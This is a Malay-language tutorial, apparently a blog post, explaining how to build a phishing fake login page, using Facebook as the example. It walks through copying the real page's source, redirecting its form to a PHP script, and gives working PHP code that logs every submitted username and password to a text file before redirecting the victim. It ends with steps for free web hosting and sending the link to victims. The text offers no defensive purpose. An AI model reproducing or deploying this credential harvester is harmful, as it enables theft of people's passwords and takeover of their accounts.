Salam semua..untuk tajuk kali ini, bagi mereka yang tidak tahu apa itu phisher, secara ringkasnya ia adalah Fake Login Page atau halaman log masuk palsu yang dibuat untuk mendapatkan kata laluan dari para pengguna, contohnya Facebook, akaun emel dan lain-lain. Entry hari ini akan menerangkan kaedah membuat phisher/fake login page secara manual untuk kesemua laman web yang anda ingini.
1. Pertama sekali buka laman web yang anda ingin untuk membuat phisher, klik kanan pada ruang kosong dan pilih ‘view source‘. Salin kesemuanya ke dalam notepad dan save sebagai namayangandasuka.html
contoh untuk tutorial ini: Facebook.html
2. Kemudian, buka Facebook.html tadi dengan notepad dan kemudian cari (ctrl+f) string ‘action = https..‘. Tukarkan alamat tersebut kepada login.php dan save.
3. Setelah itu kita perlu mencipta login.php. Untuk itu buka notepad, salin kod berikut dan save sebagai login.php
<?php
header (‘Location: http://yahoo.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Dapat dilihat disitu, sekiranya mangsa login, mereka akan diarahkan ke yahoo.com
sekiranya anda ingin mereka diarahkan ke alamat yang lain, anda hanya perlu menukar alamat http://yahoo.com itu.
Jika terdapat masalah pada code login.php ini, sila cuba code alternatif dibawah dan gantikan http://WEBSITE dengan alamat URL yang anda mahu :
header(“Location: http://WEBSITE “);
$handle =
fopen(“pass.txt”, “a”);
foreach($_GET as
$variable => $value) {
fwrite($handle,
$variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle,
“rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
4. Kemudian kita perlu mencipta fail log yang kosong (tempat penyimpanan kata laluan) dan untuk ini buka notepad, tidak perlu taip apa-apa, terus save sebagai log.txt
5. Buka satu akaun di laman web hosting percuma seperti T35.com atau 000Webhost.com
6. Muat naik ketiga-tiga fail tadi iaitu Facebook.html, login.php, log.txt ke dalam akaun web hosting yang telah dibuat dan ubah permissions bagi fail log.txt kepada 777
7. Untuk menggunakannya, hantar pautan (link) Facebook.html kepada mangsa dan setiap kali mereka log masuk melalui pautan itu, mereka akan diarahkan ke yahoo.com dan kata laluan (password) serta nama pengguna (username) akan dihantar ke fail log.txt. Anda boleh membuka log.txt untuk melihat kata laluan dan nama pengguna tersebut.